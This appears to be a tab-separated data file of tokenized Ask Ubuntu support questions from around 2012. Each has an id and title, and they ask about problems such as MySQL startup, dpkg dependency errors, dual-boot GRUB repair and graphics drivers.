227971	mysql does not start up on ubuntu 12	mysql server does not start up on ubuntu 12 . when i run the status command , the following message is displayed : error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) any suggestions to fix this issue ( and hopefully avoid this going forward ) will be welcome . edit : the process is not running - i forgot to mention that in the post . should i go about changing the mysql.cnf file to point to a different location for the socket location ( or perhaps add a link to it ) ?
227976	how to configure system wide proxy.pac on xubuntu 12.10 ?	at work i have a proxy.pac file and i 'd like to use it to configure my xubuntu 12.10 ! how can i do it ? thanks ! : d
227978	problem after mysql-server installation i cant install any thing in ubuntu 12.04.1 now	i 'm not an advanced user of linux and i tried to install work with database so i installed mysql-server , i think i did same thing wrong so i get in trouble and now i cant install any thing and this what i get when i use apt-get -f install : root @ me : ~ # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : mysql-server mysql-server-5.5 suggested packages : tinyca mailx the following packages will be upgraded : mysql-server mysql-server-5.5 2 upgraded , 0 newly installed , 0 to remove and 194 not upgraded . 2 not fully installed or removed . need to get 0 b/8,737 kb of archives . after this operation , 15.4 kb of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of mysql-server-5.5 : mysql-server-5.5 depends on mysql-server-core-5.5 ( = 5.5.24-0ubuntu0.12.04.1 ) ; however : version of mysql-server-core-5.5 on system is 5.5.28-0ubuntu0.12.04.3 . dpkg : error processing mysql-server-5.5 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i tried to remove mysql-server but nothing happened .
227979	gpt partition table problem : windows 7 and ubuntu dual boot	i hope you guys will help me get through this situation i have gotten myself into . i bought a new samsung ultra book running windows 8 . i knew going into the purchase that i wanted to ditch windows 8 and install ubuntu and windows 7 due to using this pc to build android and android apps . i used gparted and deleted the partitions and installed ubuntu on a separate partition without much grief . but now i ca n't get windows 7 installed on the other . i get a strange msg about gpt partition system or something . from my understanding that is due to a new bios system and safe boot . i disabled safe boot but still ca n't get the install . if someone wise could assist me i would be very happy . a second option would be to run a virtual machine and operate windows 7 that way but i 'm having issues with that as well . i get a driver issue that tells me to su /etc/init.d/vboxdrv update . but that gives a command does n't exist . thanks in advance !
227981	how to handle large file copies	i would like to know how i can manage copying large files of the order of 20gb and all in ubuntu . i mean is there any copy handler software as in windows . i need to pause/resume my copy and add more files to the queue . please tell me how to .
227982	how to extract multiple .7z files with password ? ( gui preferred )	i have lots of .7z files , all with the same password . how can i extract them all easily ? the default gui in ubuntu 12.04 is asking for the password for each file , which is too slow and annoying .
227984	ruby : problem with different versions	i posted this question before but i had 11.04 which is not supprted . so now i updated to 11.10 , but still the problem is not solved . i want to use ruby 1.9.1 . the problem i am facing is shown below . i wish someone could help me out . $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=11.10 distrib_codename=oneiric distrib_description= '' ubuntu 11.10 '' $ sudo apt-get install ruby1.9.1-full reading package lists ... done building dependency tree reading state information ... done ruby1.9.1-full is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 19 not upgraded . $ update-alternatives -- config ruby update-alternatives : error : no alternatives for ruby . $ ruby -v ruby 1.8.7 ( 2010-08-16 patchlevel 302 ) [ i686-linux ] $ which ruby1.9.1 /usr/bin/ruby1.9.1
227989	i cant upgrade the ubuntu distro version from terminal	when i enter sudo apt-get upgrade command in terminal , it finds some files to upgrade but not the ubuntu new release . any ideas ?
227996	external monitor resolution is 1024x768 ( cvt+xrandr distorts the output )	i have a hp 2009v lcd monitor with vga input which is plugged to my laptop with intel graphics card . windows recognizes the maximum resolution ( 1600x900 ) and displays the desktop correctly . ubuntu 12.04 , on the other hand , fails to recognize the maximum resolution and lists only 1024x768 and 800x600 . i tried to add a mode manually using cvt 1600x900 and xrandr -- newmode . when i switch to this new mode , though , the output gets distorted and the visible area shrinks to the 2/3 of the actual screen . i suspect that the mode parameters ( generated by cvt ) are incorrect for this specific monitor but i do n't have a clue how to correct them . is there a way to guess these parameters ? can i steal them from windows drivers ? is there any other solution that does not require fiddling these numbers ?
227997	how can i upgrade to unity 6.8 without upgrading to 12.10 ?	i am running 12.04 and i want to upgrade just unity without upgrading the version . is this possible ? if yes , how can i do it ? ?
227999	how to log into multiple accounts in hotot 0.9.8.10	i am using hotot 0.9.8.10 and am un-able to figure out how to log into multiple accounts . i know it is possible , because i have heard people talking about it , but i can not seem to figure it out .
228003	fix mic in an asus f5-sl	my first question ! i 'm not able to get my internal mic to work properly . all i can hear is a lot of static and noise , plus barely my voice . if i boost the sound static/noise volumes up as well . my laptop is an asus f5-sl with a hda sis966 ( alc660-vd analog ) in kubuntu 12.04 ( 64 bits ) . i tried mixing volumes with alsamixer and installing alsa-hda-dkms with no success .
228008	how to record audio in lubuntu using audio recorder ?	audio recorder is a nimble app i used to use on ubuntu to record audio from any source i.e . what you hear . in lubuntu it does n't work . prefered way : keep the audio recorded and no pulse audio installation alternatively : some other equally simple and flexible program as audio recorder plus pulse audio installation related : where are the lxde sound preferences ? how can i get line-in microphone working with skype on lubuntu 11.10 ?
228012	how can i bridge my lan port to batman-adv ?	on ubuntu 12.04 i have my laptop connected to and part of a batman network . so my laptop is meshing with the net . the script i used is this how can i install a bridge , that will allow another host laptop to get internet through my laptop ? i tried this : service network-manager stop batctl if add eth0 apt-get install bridge-utils i added this in /etc/network/interfaces auto br0 iface br0 inet static address 10.116.123.123 bridge_ports eth0 bridge_fd 5 bridge_stp no then ifconfig sais br0 link encap : ethernet hardware adresse 00 : a0 : d1 : a9 : db : da rubo78 : inet adresse:10.116.123.123 bcast:0.0.0.0 maske:255.255.255.255 bat0 link encap : ethernet hardware adresse 6e:8a:8f : f2:82 : e3 inet adresse:10.116.2.250 bcast:10.116.255.255 maske:255.255.0.0 ifup br0 batctl if eth0 : active wlan0 : active but i get no network on the host
228015	how do i make a live usb of an amd64 iso that has persistence ?	i have used both the startup disk creator and unetbootin to successfully make live usb 's with persistence for use on 32-bit machines using the i386 iso . following the same procedures , i can make bootable live usb 's for 64-bit machines using the amd64 iso . the problem is that these usb 's do not have persistence . i have tested this with ubuntu-12.04.1 abd ubuntu-12.10 iso 's . am i missing something ? is there a work-around or an alternative approach ?
228017	broadcom corporation bcm43228 802.11a/b/g/n problem	my ubuntu 12.04 lts os is picking up other networks but not mine for some reason my wireless router is netgear
228020	icon for alt-tab/application switcher	i 'm trying to get my program to install correctly , and it mostly does , the launcher icon looks fine , and it opens fine , but the icon used in the alt-tab/app switcher does n't show up . the .desktop file points to the correct location for the applications image , hence the launcher icon working , but the alt-tab icon does n't show up ... here is the problem in image form : any ideas ? thanks
228030	delete all files with certain name in entire directory	i have a directory that i want to delete all the .svn folders in all of its subdirectories . is there a command that can do this without me having to go through each individual subdirectory and delete them that way ? i tried doing it through nautilus as suggested here how to delete all the files with a certain extension from a folder and all of its subfolders ? but when i search , it does not show any hidden folders , even though i have that option enabled . any help is appreciated .
228031	how do you get a uuid from a a device on the grub2 prompt ?	i 'm trying to perform some grub2 troubleshooting related to this question , and as part of the troubleshooting i 'm trying to figure out what grub can see during the boot . how can i get the uuid of , say ( hd0 , msdos1 ) while i 'm at the grub2 prompt ?
228041	how to change the splash screen	i have used a lot of tools to change the ubuntu splash screen during boot , but the splash screen does n't change . please tell me what i should do to change the splash screen in ubuntu 12.04 lts thank you .
228049	how can i install windowscodecs using wine 1.5.19 ?	i 'm having a hard time trying to install windowscodecs.dll with winetricks . i wish to install it in order to play `` star wars : knights of the old republic '' . just installing the game wo n't work . a message from wine says that this dll is necessary . so , using winetricks , i get : '' note : command 'wine wic_x86_enu.exe /passive ' returned status 67 . aborting . '' i 've tried to download the dll and place it in the system folder , inside drive c , in .wine , and inside the game folder . does n't make any difference , wine still requires the dll . any ideas ?
228050	is there a tool to quickly create custom keyboard layouts for international keyboard , greek and unicode math ?	is there a tool to quickly create custom keyboard layouts ? for example to achieve this : http : //tex.stackexchange.com/a/86559/1871 producing unicode characters in secondary layers , but based on us international ( alt gr-dead keys ) this is mainly to type math in using unicode , but keeping the default layer to be us international . maybe there is one prepared already that is pretty general , if so then how to install it ? this question is not about generating short-cuts in a particular application but to change the system 's keyboard layout .
228053	how to change double key stroke rate ubuntu 12.04	i am an absolute newbie and struggling with ubuntu ! i am using unity on 12.04 and where possible prefer to use gui controls rather than terminal . in i can alter the repeat rate when a key is held down but can find no way to change the delay when repeating a key stroke as when typing double letters ( allow , see . etc ) at the moment i have to wait about 0.5sec before i can type the repeated letter ! how can i speed this up ? have checked many other answers in the forums but can not find this question .
228061	ubuntu v12.10 - crtc:10 error	i downloaded ubuntu v12.10 and burned it to a cd . i then booted my hp pavilion m7750n from the cd and the install went smoothly . at the end of install the system advised that it was required to do a reboot , which it did . after rebooting i was presented with a purple/red screen for about 1/10 second , then the black screen with the following three lines of text : [ 13.841736 ] [ drm : drm_crtc_helper_set_config ] *error* failed to set mode on [ crtc:10 ] [ 13.841758 ] [ drm : drm_crtc_helper_set_config ] *error* failed to set mode on [ crtc:10 ] [ 15.525126 ] [ drm : drm_crtc_helper_set_config ] *error* failed to set mode on [ crtc:10 ] i read some posts in this ubuntu forum and the only thing i could find comparable to my problem was dated in may 2012 , but did not present a solution at the end . also , it dealt with v12.04 . my question : has any progress been made regarding this error message ? if i 've simply missed the resolution , could someone please point me in right direction . thanks much . bjw >
228064	how to remove lubuntu and install ubuntu	i recently purchased a thinkpad r40 with lubuntu on it but do n't have the install cd 's . the person i got it from does n't know the administrator password so i ca n't access any changes . i went to the root screen thinking maybe i could change the password that way but it keeps telling me give root password for maintenance ( or type control-d to continue ) . i was hoping to uninstall lubuntu and install ubuntu but do n't know the steps for this . can anyone please help me ? i am new to linux and do n't want to mess anything up .
228065	uninstalling skype	i installed skype on my ubuntu 12.10 computer , but after opening the program i discovered that i ca n't log in with facebook , witch is my skype account . so i 'm trying to uninstall it . i followed this guide to install it http : //www.tecmint.com/install-skype-4-1-in-ubuntu-xubuntu-linux-mint/ and used the 12.10 option
228066	`` unable to load dynamic library `` error when trying to run curl with php	i ran : sudo apt-get install curl libcurl3 libcurl3-dev php5-curl put : extension=php_curl.so in both /etc/php5/cli/php.ini and /etc/php5/apache2/php.ini but running php from the command line gives me the following error : php warning : php startup : unable to load dynamic library '/usr/lib/php5/20090626+lfs/php_curl.so ' - /usr/lib/php5/20090626+lfs/php_curl.so : can not open shared object file : no such file or directory in unknown on line 0 running the install commands again tells me that everything is already the newest version . running : locate php_curl.so returns nothing .
228070	a script to call /opt/myfolder/myscript	i am try to have it when i log into the server that all i have to do is type start myscript from the location of /opt/myfolderofscripts/myscripts and also have it say starting script . i do n't want to move my scripts . the scripts call all of the other scripts in that folder so i ca n't really move this script . is there a way of doing this ? thanks
228071	setup dhcp server - `` job failed to start ''	i have an eth0 and eth1 , eth0 has dynamic ip-address and on eth1 i setup static ip-address : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto eth1 iface eth1 inet static address 10.10.0.1 netmask 255.0.0.0 gateway 10.10.0.1 and then i setup the isc-dhcp-server with the following command : interfaces= '' eth1 '' finally ... i went to this one /etc/dhcpd.conf with the following command : default-lease-time 650 ; max-lease-time 79520 ; option subnet-mask 255.0.0.0 ; option broadcast-address 10.10.0.255 ; option routers 10.10.0.2 ; subnet 10.10.0.0 netmask 255.0.0.0 { range 10.10.0.10 10.10.0.250 ; } when i try to sudo /etc/init.d/isc-dhcp-server start , i get start : job failed to start anyone knows whats wrong ?
228072	sane usb scanner works , but sane-find-scanner does n't find it	i am trying to make my canon pixma mp540 work under ubuntu 12.10 . i have installed sane using their install instructions file . now , i did sudo sane-find-scanner and it found no devices . i started making this question but i decided to try scanimage anyway , and it listed my scanner as an available device ! it all worked perfectly ( though i have n't tried any options , which sane lists nicely too by the way ) . how come sane-find-scanner does n't find it , while it works ? the man sane-usb page told something about usbfs and usblib . it told to add a line to /etc/fstab for an usbfs entry , or an usbdevfs entry if that did n't work , but neither worked so i thought i was going to have a lot of difficulties .
228075	how do i adjust the margin for the line numbers in gedit ?	recently i was able to increase the left margin between code and line numbers in gedit ( gnome-text-editor ) in ubuntu 12.10 . i do n't recall how i achieved this , neither do i recall how gedit reverted to the classical margin which is very tight for me . see screenshot : does anyone know how i can increase left margin in gedit 3.6.1 ? thanks
228080	dual boot ubuntu and windows 7 : bootmgr is missing when i tried to boot in windows	so , i do n't know what exactly how i managed to delete the mbr record on windows partition . but let me explain what i did next , i ran the ubuntu boot repair tool and now windows is not even listed in my grub loader . so i went and booted with windows cd and choose repair . then i ran ubuntu boot repair again via live cd . here is the log http : //paste.ubuntu.com/1426181/ . still no luck . looks like osprobe ca n't detect windows on my /dev/sda2 partition . any clues ? here is how my partitions look like : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x525400d1 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 509620669 254706911 7 hpfs/ntfs/exfat /dev/sda3 509622270 976773119 233575425 5 extended /dev/sda5 509622272 957757439 224067584 83 linux /dev/sda6 957759488 976773119 9506816 82 linux swap / solaris
228081	ubuntu is not booting - `` no init fount . try passing init= bootarg . '' , install from windows ( wubi )	unbuntu 10.04 installed from windows 7 ( wubi filesystme ) , now ubuntu is not booting giving this error . target filesystem does n't have /sbin/init . no init fount . try passing init= bootarg . busybox v1.13.3 ( ubuntu 1:1.13.3-1ubuntu7 ) built in shell ( ash ) enter 'help ' for a list of build in commands ( initramfs ) i looked at the suggestions here.that ca n't solved my problem because ubuntu is installed from windows and all the drive shows of windows . how can i get this to boot ?
228083	how to read wmv videos in chromium browser ?	i download a wmv video with firefox and i can read it with gnome mplayer without any problem . but if i try to read it with chromium it says to me that i have a missing plugins . how can i fix this ?
228092	mouse stopped responding after installing ubuntu server	it was 2 operating systems on my machine , windows 7 and ubuntu desktop 12.04 , both 64bit version . all works well , firstly i installed win , then the desktop version of ubuntu , lasts 's grub rewrites windows 's boot and of course added it as a variant to load . yesterday i wish to play with ubuntu server 12.04 , and install it as a third operating system . during the installation server 's grub seems to rewrite that which installed earlier ( background color became black , was purple ) . firstly , newly installed grub generates me overmuch load options for ubuntu desktop , by two for each kernel version ( normal and recovery modes ) . ok , it 's bearable , but most thing , that the mouse on this machine is totally stops responding , regardless which operating system i choose to load . hope somebody help me . thanks in advance !
228096	terminal bell does n't ring	i 'd like to get the terminal bell playing through my speakers , but so far i have n't had any luck . i 've tried the suggestions in this question as well as a number of other sources , but i have n't had any luck . i 've also gone the route of un-blacklisting pcspkr in modprobe , but that only works for the beep command , not the terminal bell , echo -e '\a ' , ping -a , etc . i do n't have a `` pc beep '' option in alsamixer
228098	does ubuntu on nexus 7 support the gps hardware ?	if i install ubuntu onto my nexus 7 via this guide will i still be able to use gps and google maps ?
228101	retrieving email backup and mozilla bookmarks from command line	i ca n't get past the logon screen after upgrading to 12.04 so i want to get a email backup and mozilla bookmarks before reinstalling . can someone help me on this . i 'm getting permission denied when trying to access the evolution folder and when i do the ~/.mozilla is says files does not exist
228102	my ubuntu liveusb wo n't boot after formatting it on windows xp . help !	i formatted because the windows xp i was using would n't let me view the drive in the window without formatting first , so i just said what the heck . turns out , after using the linux usb creator , placing the iso on disc properly and booting , bios hangs ; no bootloader , no startup , nothing . windows xp 's formatting screwed something up with my usb 's filesystem , and i 'm uncertain of what to do . help ? ! my business depends on me using an os , so prompt ideas are a must and very appreciated ( no money ) . ps : i checked the contents of the disc , and they are all okay . steps : 1.formatted the usb because windows xp said i could n't access the drive contents without formatting it first . i initially only took this step because i changed the a setting mistakenly on ubuntu 's system settings that resulted in the drive being unable to boot . this resulted in my 16gb flash drive shrinking to 2gb . 2.used linux usb pendrive creator program , selected appropriate drive letter , selected appropriate ubuntu 12.04 iso 32-bit file , and waited until finished . 3.unmounted usb drive , plugged into my computer , bios already configured to boot from usb , not hard drives containing any other os , and bios just shows the stupid flickering input character in 80x25 text video mode .
228111	how can i search for a file by date in kubuntu ?	i believe that an earlier version of dolphin enabled one to search for a file by date . this facility seems to have gone . if i wanted to to search for a libre office writer file modified last august , say , but had completely forgotten the file 's name , i would enter *odt and a dialog box would offer me the opportunity to narrow the parameters to files modified between 1/8 and 31/8 , and return a few files . now the search will return hundreds of files . admittedly it is quick to sort by date , but the list takes much longer to create .
228113	how do i change tty / text console resolution without rebooting ?	fbset is not an option . it does n't apply any change `` live '' . also , fbset is not even useful . it looks like it 's only going to display current settings .
228118	12.10 native drivers intel hd 4000	i have an intel 3770 i7 with build in hd 4000 which i intend to use as my primary video card for 3d editing . the problem is that i ca n't set it up correctly . first of all i 've made a clean install of ubuntu ( created bootable usb ) . but it did n't recognized available resolutions for my display ( max was 1024x768 ) so i had to add them manually ( using xrandr command ) ( it may be caused by using tv as a display instead of actual pc monitor , i do n't know ) then i installed and started using my editing software - blender ( from blender.org ) . it was rendering my scenes fast and clean , but 3d editing view-port was really sluggish and blender crashed a lot ( especially after turning on vbo or glsl ) . then i noticed that in system info my gpu is `` unknown '' so i started searching for solution and end up updating kernel to 3.7 ( i believe ) which made my keyboard and mouse unresponsive , so i started all over again i 've installed windows 7x64 to test blender there ( its my brand new pc , so i was n't sure it was ubuntu 's issue ) in windows everything worked as expected , no sluggish unresponsive view-port and relatively fast final rendering i 've installed ubuntu again ( this time i used wubi ( windows easy install ) ) and screen resolutions detected automatically ( but again , i was using pc monitor this time , so it might not be relevant ) but blender view-port was still sluggish and my system info still showed `` unknown '' graphics card i 've installed mesa and this time my card was displaying correctly in system info , but problems in blender view-port remained . i 've reported blender bug and they told me that i should use native driver , and that mesa is to buggy for my purposes . i found out that i already have intel driver installed in my software center so i 've removed it and installed it again ( hoping they will overwrite mesa ) q : how to remove mesa , how to install native driver for intel hd 4000 and make blender 's view-port responsive , and fix crashes here 's the link to answer form blender developers http : //projects.blender.org/tracker/ ? func=detail & atid=231 & aid=33478 & group_id=9 i 'll be glad to provide any additional info . i 'd really like to use ubuntu instead of windows , because it renders my scenes up to 30 % faster thank you asus p8h77-v le , intel 3770 , 8gb 1866 ram , intel hd 4000 , intel ssd 520 series , ubuntu 12.10 amd64
228122	dual booting default to windows 7	i have ubuntu 12.10 dual booting with windows 7 . how can i change windows 7 to my default operating system ? right now it automatically boots to ubuntu with no screen displaying what one to choose . the only way for me to get into windows 7 is to press f12 at startup select my hard drive then grub decides to show up and i can select windows 7 from there .
228131	why wo n't my code work in ubuntu server 11.10 ? is it because of gd library ?	i get this error when running the following code : no such file found at `` widgets/104-text.png '' i know that the code works because it works on my other non-ubuntu server . i do not know if it is gd library or what . i tried both the bundled version and the non-bundled and both do not make this code work . $ con = mysql_connect ( `` localhost '' , '' user '' , '' abc123 '' ) ; if ( ! $ con ) { die ( 'could not connect : ' . mysql_error ( ) ) ; } mysql_select_db ( `` satabase_name '' , $ con ) ; $ productid2 = $ this- > product- > id ; $ thename = mysql_query ( `` select * from pshop_product_lang where id_product = ' $ productid2 ' limit 1 '' ) ; $ thename2 = mysql_fetch_array ( $ thename ) ; $ string2 = $ thename2 [ 'name ' ] ; $ string = ( strlen ( $ string2 ) > 25 ) ? substr ( $ string2 , 0 , 25 ) . ' ... ' : $ string2 ; $ font = 4 ; $ width = imagefontwidth ( $ font ) * strlen ( $ string ) ; $ height = imagefontheight ( $ font ) ; $ image = imagecreatetruecolor ( $ width , $ height ) ; $ white = imagecolorallocate ( $ image,255,255,255 ) ; $ black = imagecolorallocate ( $ image,0,0,0 ) ; imagefill ( $ image,0,0 , $ white ) ; imagestring ( $ image , $ font,0,0 , $ string , $ black ) ; imagepng ( $ image , 'widgets/ ' . $ productid2 . '-text.png ' ) ; $ getimg110 = mysql_query ( `` select * from pshop_image where id_product = ' $ productid2 ' '' ) ; $ gotimg110 = mysql_fetch_array ( $ getimg110 ) ; $ slash110 = addcslashes ( $ gotimg110 [ id_image ] , '\0..\999999999999999999999 ' ) ; $ str110 = str_replace ( '\\ ' , '/ ' , $ slash110 ) ; $ newimg110 = ' < img src= '' img/p ' . $ str110 . '/ ' . $ gotimg110 [ id_image ] . '-large_default.jpg '' / > ' ; include ( `` conf.inc.php '' ) ; include ( 'imageworkshop.php ' ) ; // initialization of layer you need $ pingulayer = new imageworkshop ( array ( 'imagefrompath ' = > 'widgets/background.png ' , ) ) ; $ pingulayer2 = new imageworkshop ( array ( 'imagefrompath ' = > 'img/p ' . $ str110 . '/ ' . $ gotimg110 [ id_image ] . '-large_default.jpg ' , ) ) ; $ pingulayer3 = new imageworkshop ( array ( 'imagefrompath ' = > 'widgets/ ' . $ productid2 . '-text.png ' , ) ) ; // resize pingu layer $ thumbwidth2 = 150 ; // px $ thumbheight2 = 150 ; $ thumbwidth = 400 ; // px $ thumbheight = 200 ; $ pingulayer2- > resizeinpixel ( $ thumbwidth2 , $ thumbheight2 ) ; $ pingulayer- > resizeinpixel ( $ thumbwidth , $ thumbheight ) ; // add 2 layers on pingu layer $ pingulayer- > addlayerontop ( $ pingulayer2 , null , null , 'lm ' ) ; $ pingulayer- > addlayerontop ( $ pingulayer3 , 70 , 25 , 'mm ' ) ; // saving the result in a folder $ pingulayer- > save ( `` widgets/ '' , $ productid2 . `` .gif '' , true , null , 95 ) ; the file path is correct , however this part of the code is not creating the image as it is supposed to : $ thename2 = mysql_fetch_array ( $ thename ) ; $ string2 = $ thename2 [ 'name ' ] ; $ string = ( strlen ( $ string2 ) > 25 ) ? substr ( $ string2 , 0 , 25 ) . ' ... ' : $ string2 ; $ font = 4 ; $ width = imagefontwidth ( $ font ) * strlen ( $ string ) ; $ height = imagefontheight ( $ font ) ; $ image = imagecreatetruecolor ( $ width , $ height ) ; $ white = imagecolorallocate ( $ image,255,255,255 ) ; $ black = imagecolorallocate ( $ image,0,0,0 ) ; imagefill ( $ image,0,0 , $ white ) ; imagestring ( $ image , $ font,0,0 , $ string , $ black ) ; imagepng ( $ image , 'widgets/ ' . $ productid2 . '-text.png ' ) ;
228134	evolution calender not opening	i installed evolution calendar from the software center . but the icon is not showing up in the apps menu in the dash . i 've tried restarting after installing but its not coming . software centre : http : //flic.kr/p/daygmx app lens : http : //flic.kr/p/db4jmq
228136	how to remove all lvs vgs and partitions on all drives before installing 12.04	i have 2 hard drives that had been used for ubuntu server 11.10 . now i would like to start from scratch with 12.04 but i 'm having some trouble with the existing logical volumes and volume groups . erasing data during install looks like it 's going to take days . is there a quick and simple way to wipe out all volumes/groups/partitions so i can start with 2 empty drives ? when i set this up on 11.04 it took me a while to learn how to do it and i 've since forgotten most of what i learned . for what it 's worth , i 'm only using this box to try and learn about linux . thanks in advance , mark
228139	session locked , kubuntu 12.10	after leaving my laptop for a while , my kubuntu session closed . ( i 'm not sure which of the various timeout criteria caused it . ) so i got a screen that said my session was locked and i needed to provide my password to unlock it . that 's a nuisance , not a big problem , but i 'd like to fix it so timed-out sessions do n't lock the session . i assume there 's something in system settings to disable the lockout -- but where ? i looked in power management and found a setting `` lock screen on resume '' , but it 's unchecked . is this possibly a bug ?
228141	ca n't get past login screen -graphics drivers 12.10	newbie linux user here . i just installed ubuntu 12.10 , dual booting with windows 8 preview release build 8400 on a dell precision 490 workstation with nvidia quandro nvs 55/280 pci graphics card . i can not login to ubuntu - after entering my password and pressing enter , the screen graphics gets garbled for a few seconds , and then the screen goes black showing only the mouse cursor . i suspect it 's something to do with my graphics card , everything on the gui login screen feels very sluggish . i know what i have provided here does n't give you much information , would appreciate it if i could get some guidance on how to provide more useful logs . thank you .
228143	i need someone to talk me through how to `` hdiutil convert '' ( ubuntu-12.10-desktop-i386.iso ) to an .img file	i need to create a bootable drive from the aforementioned file . i have an external drive which i am planning to use ; i was also curious about whether i only need the drive as a means of booting , or to boot and save data . so , to recap : does data , other than the initial `` burning '' to the drive save to the drive afterwards ?
228144	video/audio output via hdmi ubuntu 12.04	i 've been out of the ubuntu loop for quite a while now and have a completely new laptop now . just installed ubuntu 12.04 64-bit and would like to output my video and my audio via hdmi to my television . the following is the lspci | grep vga for my computer . please tell me if there is any additional information needed and preferably how to obtain it and i will be more than happy to oblige . thank you in advance for your time and assistance in this matter . 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev a1 ) edit : every time i restart my computer , after a short moment , i get an error message stating something along the lines `` sorry , jockey needed to close unexpectedly . '' after researching , i discovered jockey is the name of the `` additional drivers , '' which after initial installation , ubuntu informed me of proprietary drivers available . those are no longer available , and this error continues to occur .
228146	ubuntu on low powered laptop	first off , i am new to ubuntu . i come from a windows background ( dos before that ) and am loving it so far . i installed it on an older dell laptop that i wanted to get another year out of . i set this machine up primarily as a lamp development machine for a project i am working on . the machine is a vostro 1500 and it has 4gb ram ( maxed ) and an upgraded hard drive . i ca n't watch youtube videos for long before it starts to overheat and start acting sporadic . i can live without youtube but every so often the application switching ( alt-tab ) gets slower and begins not showing all applications and the dash home quits displaying properly . i am sure i am asking a lot of this old machine . what i really want to know is : are there any settings in ubuntu that allow me to lower the graphic effects ( fade-ins , transparencies , fancy transitions , etc ) that would be less taxing on the video card ?
228149	zfs partition as swap	i 'm using native-zfs and was wondering if there is a way to use a zfs partition for swap . i 'm running my server off of a thumbdrive and thought that would be a good way to speed it up a little bit .
228151	installed geany has no options	i 'm new to geany ide . i installed geany from ubuntu software centre , and the window has no options other than opening a new file . i ca n't file any preference , tools option too for configuring . i heard it is a full fledged ide . also , from the screenshots available from the software center , it seems my geany installation is missing almost everything . i 'm not able to post the screenshots , but my interface just has 3 buttons . create a new file , open an existing file and a quit button . everything else is inactive . i accidentally closed the sidepane , and i ca n't find any options to bring back that too . edit what am i missing in my geany installation ? ps : i tried installing from source from geany website . but , it posted some error saying gtk files not found . but , i removed geany from software centre and reinstalled several times . it installed geany without problems , but with afore mentioned problems , that is i have nothing in my interface . also , even after reinstalling , somehow geany remembers to hide the sidepane by default , which i 'm not able to see at all . i also added geany ppa repository manually for latest fixes , but still when i reinstall from software centre i get a plain blank geany interface . thanks .
228155	ubuntu software center not working after update	today , i updated my ubuntu ( i have kde desktop installed on it before ) and after the update , ubuntu software center said : items can not be installed or removed until the package catalog is repaired . do you want to repair it ? ; and when i 'm clicked on repair , after 2 seconds it says : the installation or removal of software package failed , with this details : installarchives ( ) failed : dpkg : dependency problems prevent configuration of kdm : kdm depends on libkworkspace4abi1 ( = 4:4.8.5-0ubuntu0.1 ) ; however : version of libkworkspace4abi1 on system is 4:4.8.5-0ubuntu0.2 . kdm depends on kde-workspace-kgreet-plugins ( = 4:4.8.5-0ubuntu0.1 ) ; however : version of kde-workspace-kgreet-plugins on system is 4:4.8.5-0ubuntu0.2 . dpkg : error processing kdm ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of kubuntu-desktop : kubuntu-desktop depends on kdm ; however : package kdm is not configured yet . dpkg : error processing kubuntu-desktop ( -- configure ) : no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . dependency problems - leaving unconfigured errors were encountered while processing : kdm kubuntu-desktop error in function : dpkg : dependency problems prevent configuration of kdm : kdm depends on libkworkspace4abi1 ( = 4:4.8.5-0ubuntu0.1 ) ; however : version of libkworkspace4abi1 on system is 4:4.8.5-0ubuntu0.2 . kdm depends on kde-workspace-kgreet-plugins ( = 4:4.8.5-0ubuntu0.1 ) ; however : version of kde-workspace-kgreet-plugins on system is 4:4.8.5-0ubuntu0.2 . dpkg : error processing kdm ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of kubuntu-desktop : kubuntu-desktop depends on kdm ; however : package kdm is not configured yet . dpkg : error processing kubuntu-desktop ( -- configure ) : dependency problems - leaving unconfigured how to solve this ?
228157	how to make a backup of ubuntu 12.04 full os	how to make a complete operating system backup of ubuntu without anything missing , to switch it to a different hard drive ? a complete personal usable backup without using untrusted software , exactly like original .
228166	why is the touchpad tab missing ?	so my dell vostro 3360 came out of the box with an alps touchpad which was detected as ps/2 . through these steps , i was able to get as far as it appearing to be recognized as a touchpad . howevver , i do not get the touchpad tab in the mouse/touchpad settings . two-finger scrolling appears to work , and the fn-f3 does disable the touchpad , but the settings are so brutal that it is almost impossible to work with . very difficult to scroll at all accurately . i 'm hoping there 's some settings which can be tweaked which will help with this . any ideas ? my xinput listing is as follows : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ glidepoint virtual touchpad id=12 [ slave pointer ( 2 ) ] thanks ,
228167	i wa n't to make pc for library . and have some problem ) )	i use ubuntu 12.04 . for make .desktop i used this instructions : http : //www.instructables.com/id/setting-up-ubuntu-as-a-kiosk-web-appliance/step4/set-up-chromium/ 1 problem : no users ca n't download kiosk.desktop - they download ubuntu.desktop and change that properties in home/user/.dmrc . how can i fix that problem ? once i put all properties that i maked for kiosk.desktop into ubuntu.desktop and it 's start work ... but on every created users , and after i reinstalled system . 2 problem : can i write in .desktop which program users can use ? if yes-how ? 3 problem : which programm is better to use in proxy for ubuntu 12.04 ? sorry for my english and thanks yuri
